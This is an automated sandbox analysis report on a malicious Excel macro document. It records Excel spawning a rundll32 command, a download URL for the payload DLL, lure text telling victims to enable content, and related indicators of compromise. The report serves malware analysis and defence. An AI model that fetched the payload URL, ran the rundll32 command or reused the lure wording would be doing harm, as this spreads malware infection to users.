Loading ...

Play interactive tourEdit tour

Analysis Report e1df57de_by_Libranalysis

Overview

General Information

Sample Name:e1df57de_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:403717
MD5:e1df57deebdfeab450bf91049acff902
SHA1:0037a523a17be3411b88072f7ceb3cc0ef384da7
SHA256:b0cccc9e79029c5b0b4e835e22e783a37ded6a300ca9d1738e554b126dd0969c
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2512 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1552 cmdline: rundll32 ..\qqjdkdl.obp,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
e1df57de_by_Libranalysis.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x16663:$e1: Enable Editing
  • 0x163ad:$e3: Enable editing
  • 0x1647f:$e4: Enable content

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\qqjdkdl.obp,StartW, CommandLine: rundll32 ..\qqjdkdl.obp,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2512, ProcessCommandLine: rundll32 ..\qqjdkdl.obp,StartW, ProcessId: 1552
Sigma detected: System File Execution Location AnomalyShow sources
Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\qqjdkdl.obp,StartW, CommandLine: rundll32 ..\qqjdkdl.obp,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2512, ProcessCommandLine: rundll32 ..\qqjdkdl.obp,StartW, ProcessId: 1552

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: e1df57de_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 170.249.236.47:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: obsusa.net
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.249.236.47:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.249.236.47:443
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\975C826B.emfJump to behavior
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: obsusa.net
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: e1df57de_by_Libranalysis.xlsString found in binary or memory: https://obsusa.net/chemgrcr.dll
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownHTTPS traffic detected: 170.249.236.47:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editina document downloaded from the Internet. 13 " ' 14 RunDLL |~|
Source: Screenshot number: 4Screenshot OCR: Enable content" to perfor tart 18 the decryption of the document The specified module could not be
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: e1df57de_by_Libranalysis.xlsInitial sample: EXEC
Source: e1df57de_by_Libranalysis.xlsInitial sample: CALL
Source: e1df57de_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: e1df57de_by_Libranalysis.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal76.expl.evad.winXLS@3/9@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE4E2.tmpJump to behavior
Source: e1df57de_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\qqjdkdl.obp,StartW
Source: e1df57de_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\qqjdkdl.obp,StartW
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\qqjdkdl.obp,StartWJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
e1df57de_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
obsusa.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://obsusa.net/chemgrcr.dll2%VirustotalBrowse
https://obsusa.net/chemgrcr.dll0%Avira URL Cloudsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
obsusa.net
170.249.236.47
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpfalse
      high
      https://obsusa.net/chemgrcr.dlle1df57de_by_Libranalysis.xlsfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://investor.msn.comrundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              170.249.236.47
              obsusa.netUnited States
              63410PRIVATESYSTEMSUSfalse

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:403717
              Start date:04.05.2021
              Start time:10:50:30
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 22s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:e1df57de_by_Libranalysis (renamed file extension from none to xls)
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal76.expl.evad.winXLS@3/9@1/1
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Excluded IPs from analysis (whitelisted): 205.185.216.42, 205.185.216.10
              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              PRIVATESYSTEMSUScopy of payment 7006.vbsGet hashmaliciousBrowse
              • 170.249.206.186
              369290.xlsGet hashmaliciousBrowse
              • 204.197.253.150
              Payment_png.exeGet hashmaliciousBrowse
              • 170.249.199.106
              R8WWx5t2RE.dllGet hashmaliciousBrowse
              • 108.160.158.123
              P.O 5282.exeGet hashmaliciousBrowse
              • 170.249.209.250
              documentation (64).xlsGet hashmaliciousBrowse
              • 67.222.24.174
              documentation (64).xlsGet hashmaliciousBrowse
              • 67.222.24.174
              Statement for T10495.jarGet hashmaliciousBrowse
              • 207.7.94.54
              Statement for T10495 - 18-01-21 15-23.jarGet hashmaliciousBrowse
              • 207.7.94.54
              Revise Order.exeGet hashmaliciousBrowse
              • 162.248.50.97
              PO21010699XYJ.exeGet hashmaliciousBrowse
              • 162.248.50.97
              cmtel-pdf.htmlGet hashmaliciousBrowse
              • 204.197.244.149
              cmtel-pdf.htmlGet hashmaliciousBrowse
              • 204.197.244.149
              SecuriteInfo.com.Trojan.PWS.Stealer.29660.11031.exeGet hashmaliciousBrowse
              • 162.211.86.20
              https://oldfordcrewcabs.com/bin/new/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=576667a3e7108b979c62abddd4c8f3e39d282c0ee888bd787542afb4ff83df171524e184Get hashmaliciousBrowse
              • 199.167.203.145
              SecuriteInfo.com.Trojan.PackedNET.405.30542.exeGet hashmaliciousBrowse
              • 162.211.86.20
              4ADvH4Xsmh.exeGet hashmaliciousBrowse
              • 162.246.57.153
              https://www.casalfarneto.it/wp-content/siteguarding_logs/www.htmlGet hashmaliciousBrowse
              • 104.193.111.209
              RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exeGet hashmaliciousBrowse
              • 158.106.136.41
              justificante de la transfer.exeGet hashmaliciousBrowse
              • 162.246.57.153

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              7dcce5b76c8b17472d024758970a406bMV RED SEA.docxGet hashmaliciousBrowse
              • 170.249.236.47
              SecuriteInfo.com.Heur.31681.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              catalog-1521295750.xlsmGet hashmaliciousBrowse
              • 170.249.236.47
              Documents_111651917_375818984.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
              • 170.249.236.47
              presupuesto.xlsxGet hashmaliciousBrowse
              • 170.249.236.47
              ORDER INQUIRY.docGet hashmaliciousBrowse
              • 170.249.236.47
              Outstanding Payment Plan.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              diagram-586750002.xlsmGet hashmaliciousBrowse
              • 170.249.236.47
              94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              Documents_585904356_2104184844.xlsGet hashmaliciousBrowse
              • 170.249.236.47
              e9251e1f_by_Libranalysis.docxGet hashmaliciousBrowse
              • 170.249.236.47
              statistic-1048881972.xlsmGet hashmaliciousBrowse
              • 170.249.236.47
              Specificatiile produsului.xlsxGet hashmaliciousBrowse
              • 170.249.236.47
              be1aca64_by_Libranalysis.docxGet hashmaliciousBrowse
              • 170.249.236.47

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
              Category:dropped
              Size (bytes):58596
              Entropy (8bit):7.995478615012125
              Encrypted:true
              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
              MD5:61A03D15CF62612F50B74867090DBE79
              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
              Malicious:false
              Reputation:high, very likely benign file
              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):326
              Entropy (8bit):3.123116142976021
              Encrypted:false
              SSDEEP:6:kK9HwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:lwTJrkPlE99SNxAhUe0ht
              MD5:4B4AF5764F733CB186F0CCE825F1B5ED
              SHA1:C6582ED75D327F03335109A190DFF5A1365AFCD6
              SHA-256:2B7B8F00FCA38B4A4FF8A7EA3D9594AAF3E68FF23A9FEB75E9663FB37B7AE25A
              SHA-512:E126E27AE9B4B1AE37D5859D215C4AD925607687C4A90BF8DB9AEBA76653628E6834D2698ED6A1466F37FCDAE160A9C047907C966837C3A348904255963EF396
              Malicious:false
              Reputation:low
              Preview: p...... ..........P(.A..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
              C:\Users\user\AppData\Local\Temp\22FE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):85602
              Entropy (8bit):7.88931065964453
              Encrypted:false
              SSDEEP:1536:7QOgB6pDwoXAeWvikWYgWGHKlMVGoIahaDHTU6hryF70/EN:7QOgB6pDdAikWYgW2K2sTU2yF70/EN
              MD5:C6DAF044B82CF7A6525839E943380AA9
              SHA1:BDE146DC0F93F31ED594B88E63234B0CE37B507C
              SHA-256:BDA5EFB761942C9A776846A7F3843DB8A42F929058899A2C086511961A4876AE
              SHA-512:04D33442367968ED7CEEA58A4EBCED3D0C550DBA595D6E9257B3ACBD5EE78BEBA3771EC32D7503EDA320F676160EB0AAC1E4BDDC1B85932830D3AB61B9584E5C
              Malicious:false
              Reputation:low
              Preview: .U.N.0.}..?D~E..*UU.Y..<.R...{...7.....q6.X.M"..K...9sf...E.U..>HkJrV,H..[!.$..n.$.....5P.-.r.:..|.:...M(I...Ei.5h.....Ne.f....:.7l..|..A.5.L.c. ...T.I....]$.Iv.;..J"u.u:..].".<..c<...b.).Y.|.g#......PK.N..'.i..........x.4..../.o.....IR.:..pPE..b.....G...y...R...}.M..X..V.. ,..X."8.L.dZ..I.=3....G.....k.....v.....G..>!..e."wf....K....m._..-.H.C.*..r:..tL.f....].=...#q..^R....z.;..].......9.=.!}.u........^'IB....G..,..."...{.... ..i;.W........PK..........!...i.............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\CabF9EA.tmp
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
              Category:dropped
              Size (bytes):58596
              Entropy (8bit):7.995478615012125
              Encrypted:true
              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
              MD5:61A03D15CF62612F50B74867090DBE79
              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
              Malicious:false
              Reputation:high, very likely benign file
